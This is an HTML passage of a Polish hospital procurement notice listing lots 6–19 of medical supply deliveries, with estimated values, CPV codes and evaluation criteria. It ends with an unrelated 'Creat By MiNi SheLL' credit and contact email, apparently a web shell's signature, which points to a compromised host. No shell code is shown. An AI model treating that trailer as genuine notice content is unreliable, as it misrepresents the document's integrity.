<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy zestawów do drenażu przezskórnego metodą jednostopniową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 4 740,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy zestawów do drenażu przezskórnego metodą jednostopniową.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.14.16.25-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy worków stomijnych, urostomijnych oraz pasty stomijnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 19 620,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy worków stomijnych, urostomijnych oraz pasty stomijnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy ustników - filtrów do gazu entonox.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 5 760,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy ustników - filtrów do gazu entonox.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Sukcesywne dostawy klipsów naczyniowych tytanowych i polimerowych stosowane do zabiegów laparoskopowych, zwanych dalej wyrobami wraz z udostępnieniem klipsownic pasujących do każdego rozmiaru klipsów wymaganych przez zamawiającego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 15 300,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy  klipsów naczyniowych tytanowych i polimerowych stosowane do zabiegów laparoskopowych, zwanych dalej wyrobami wraz z udostępnieniem klipsownic pasujących do każdego rozmiaru klipsów wymaganych przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sukcesywne dostawy nebulizatorów typu Cirrus z rurką T do układu oddechowego z drenem oraz zestawów nebulizatora typu Cirrus z maską dla dorosłych z drenem tlenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 4 920,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy nebulizatorów typu Cirrus z rurką T do układu oddechowego z drenem oraz zestawów nebulizatora typu Cirrus z maską dla dorosłych z drenem tlenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.72.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sukcesywne dostawy cewników do podawania tlenu przez nos, drenów do tlenu, nebulizatorów, masek  z nebulizatorem, masek z rezerwuarem oraz masek z drenem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 19 680,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy  cewników do podawania tlenu przez nos, drenów do tlenu, nebulizatorów, masek  z nebulizatorem, masek z rezerwuarem oraz masek z drenem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.15.72.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sukcesywne  dostawy szyn palcowych Zimmera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 2 070,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy szyn palcowych Zimmera.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.60-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Sukcesywne dostawy worków na zwłoki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 10 020,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy worków na zwłoki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.92.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sukcesywne dostawy sond do bezpiecznego żywienia dla noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 28 860,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy sond do bezpiecznego żywienia dla noworodków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sukcesywne dostawy myjek do mycia pacjentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 33 600,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy  myjek do mycia pacjentów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.70.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Sukcesywne dostawy cewników Fogartyego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 13 560,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy cewników Fogartyego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.70.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sukcesywne dostawy worków do żywienia pozajelitowego typu Nutrimix.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 5 520,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy worków do żywienia pozajelitowego typu Nutrimix.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Sukcesywne dostawy zestawów do szynowania wewnętrznego moczowodów dla dorosłych i dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 36 780,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy zestawów do szynowania wewnętrznego moczowodów dla dorosłych i dla dzieci.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.25-7, 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Sukcesywne dostawy do siedziby zamawiającego zestawów do podaży leków i płynów, krwi oraz preparatów krwiopochodnych do posiadanych przez zamawiającego pomp objętościowych Medima.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 46 020,00 PLN (zamówienie podstawowe i uzupełniające) są dostawy do siedziby zamawiającego zestawów do podaży leków i płynów, krwi oraz preparatów krwiopochodnych do posiadanych przez zamawiającego pomp objętościowych Medima.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com